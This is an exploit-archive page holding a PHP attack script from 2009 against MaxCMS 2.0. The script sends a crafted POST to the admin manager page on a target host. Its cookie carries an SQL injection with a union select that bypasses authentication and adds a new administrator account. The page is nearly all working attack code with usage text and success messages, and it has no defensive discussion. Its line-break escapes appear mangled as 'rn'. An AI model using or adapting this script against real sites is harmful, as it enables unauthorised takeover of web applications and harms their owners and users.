[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MaxCMS 2.0 (m_username) Arbitrary Create Admin Exploit
# Published : 2009-05-13
# Author : Securitylab.ir
# Previous Title : webSPELL <= 4.2.0d Local File Disclosure Exploit (.c linux)
# Next Title : Mlffat 2.1 (Auth Bypass / Cookie) SQL Injection Vulnerability
<?php
print_r('
+---------------------------------------------------------------------------+
maxcms2.0 creat new admin exploit
by Securitylab.ir
+---------------------------------------------------------------------------+
');
if ($argc < 3) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to maxcms
Example:
php '.$argv[0].' localhost /maxcms2/
+---------------------------------------------------------------------------+
');
exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$name = rand(1,10000);
$cmd = 'm_username=securitylab'.$name.'&m_pwd=securitylab&m_pwd2=securitylab&m_level=0';
$resp = send($cmd);
if (!eregi('alert',$resp)) {echo"[~]bad!,exploit failed";exit;}
print_r('
+---------------------------------------------------------------------------+
[+]cool,exploit seccuss
[+]you have add a new adminuser securitylab'.$name.'/securitylab
+---------------------------------------------------------------------------+
');
function send($cmd)
{
global $host, $path;
$message = "POST ".$path."admin/admin_manager.asp?action=add HTTP/1.1rn";
$message .= "Accept: */*rn";
$message .= "Referer: http://$host$pathrn";
$message .= "Accept-Language: zh-cnrn";
$message .= "Content-Type: application/x-www-form-urlencodedrn";
$message .= "User-Agent: securitylabrn";
$message .= "X-Forwarded-For:1.1.1.1rn";
$message .= "Host: $hostrn";
$message .= "Content-Length: ".strlen($cmd)."rn";
$message .= "Cookie: m_username=securitylab'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin; m_level=0; checksecuritylab'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin=cf144fd7a325d1088456838f524ae9d7rn";
$message .= "Connection: Closernrn";
$message .= $cmd;
echo $message;
$fp = fsockopen($host, 80);
fputs($fp, $message);
$resp = '';
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
echo $resp;
return $resp;
}
?>
# www.Syue.com [2009-05-13]